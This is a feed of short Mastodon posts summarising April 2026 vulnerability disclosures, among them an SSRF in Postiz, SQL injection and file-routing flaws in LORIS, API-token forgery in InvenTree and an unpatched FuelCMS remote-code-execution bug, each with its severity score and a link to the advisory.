🟠 CVE-2026-32252 - High (7.7)

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33698
(0 None)

EPSS: 0.05%

2 posts

N/A

offseq at 2026-04-11T04:30:29.943Z ##

🔔 CVE-2026-33698: Chamilo LMS (<1.11.38) has a CRITICAL flaw — exposed install/ dir lets unauth attackers execute PHP & modify files. Upgrade to 1.11.38+ & restrict install/ directory access now! Details: radar.offseq.com/threat/cve-20

##
offseq@infosec.exchange at 2026-04-11T04:30:29.000Z ##

🔔 CVE-2026-33698: Chamilo LMS (<1.11.38) has a CRITICAL flaw — exposed install/ dir lets unauth attackers execute PHP & modify files. Upgrade to 1.11.38+ & restrict install/ directory access now! Details: radar.offseq.com/threat/cve-20 #OffSeq #Chamilo #Vuln

##

CVE-2026-40168
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T04:01:41.000Z ##

🟠 CVE-2026-40168 - High (8.2)

Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T04:01:41.000Z ##

🟠 CVE-2026-40168 - High (8.2)

Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40089
(0 None)

EPSS: 0.04%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-10T07:11:09.000Z ##

🔴 CVE-2026-40089 - Critical (9.9)

Sonicverse is a Self-hosted Docker Compose stack for live radio streaming. The Sonicverse Radio Audio Streaming Stack dashboard contains a Server-Side Request Forgery (SSRF) vulnerability in its API client (apps/dashboard/lib/api.ts). Installation...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0234
(0 None)

EPSS: 0.00%

1 posts

N/A

AAKL@infosec.exchange at 2026-04-09T17:14:18.000Z ##

Palo Alto posted several advisories yesterday, if you missed them:

- Critical: CVE-2026-0234 Cortex XSOAR: Improper Verification of Cryptographic Signature in Microsoft Teams integration security.paloaltonetworks.com/

- PAN-SA-2026-0004 Chromium: Monthly Vulnerability Update (April 2026) security.paloaltonetworks.com/

- CVE-2026-0233 Autonomous Digital Experience Manager: Improper validation of ADEM certificate security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability #Chromium

##

CVE-2026-0233
(0 None)

EPSS: 0.00%

1 posts

N/A

AAKL@infosec.exchange at 2026-04-09T17:14:18.000Z ##

Palo Alto posted several advisories yesterday, if you missed them:

- Critical: CVE-2026-0234 Cortex XSOAR: Improper Verification of Cryptographic Signature in Microsoft Teams integration security.paloaltonetworks.com/

- PAN-SA-2026-0004 Chromium: Monthly Vulnerability Update (April 2026) security.paloaltonetworks.com/

- CVE-2026-0233 Autonomous Digital Experience Manager: Improper validation of ADEM certificate security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability #Chromium

##

CVE-2026-30461
(0 None)

EPSS: 0.00%

1 posts

N/A

pentesttools@infosec.exchange at 2026-04-09T10:40:19.000Z ##

"It's just dev mode."

PTT-2025-028 / CVE-2026-30461 disagrees. Any authenticated user on a FuelCMS dev instance can drop a PHP shell via git submodule and call it from the browser. One HTTP request. Full RCE. CVSS 8.8 High.

No patch coming. Project's been dormant for almost 4 years.
Found by Raul Bledea and Matei "Mal" Bădănoiu.

Full PoC: pentest-tools.com/research

#offensivesecurity #vulnerabilityresearch

##

CVE-2026-34392
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-09T06:00:13.000Z ##

🟠 CVE-2026-34392 - High (7.5)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33350
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-09T06:00:03.000Z ##

🟠 CVE-2026-33350 - High (7.5)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, a SQL injection has been identified in some code sections fo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35169
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-09T05:15:07.000Z ##

🟠 CVE-2026-35169 - High (8.7)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From to before 27.0.3 and 28.0.1, the help_editor module of LORIS did not properly sani...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35446
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-09T05:14:57.000Z ##

🟠 CVE-2026-35446 - High (7.7)

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 24.0.0 to before 27.0.3 and 28.0.1, an incorrect order of operations in the FilesDo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35478
(0 None)

EPSS: 0.07%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-09T05:01:03.000Z ##

🟠 CVE-2026-35478 - High (8.3)

InvenTree is an Open Source Inventory Management System. From 0.16.0 to before 1.2.7, any authenticated InvenTree user can create a valid API token attributed to any other user in the system — including administrators and superusers — by suppl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39863
(0 None)

EPSS: 0.11%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-09T05:00:53.000Z ##

🟠 CVE-2026-39863 - High (7.5)

Kamailio is an open source implementation of a SIP Signaling Server. Prior to 6.1.1, 6.0.6, and 5.8.8, an out-of-bounds access in the core of Kamailio (formerly OpenSER and SER) allows remote attackers to cause a denial of service (process crash) ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39860
(0 None)

EPSS: 0.02%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-09T05:00:05.000Z ##

🔴 CVE-2026-39860 - Critical (9)

Nix is a package manager for Linux and other Unix systems. A bug in the fix for CVE-2024-27297 allowed for arbitrary overwrites of files writable by the Nix process orchestrating the builds (typically the Nix daemon running as root in multi-user i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
Visit counter For Websites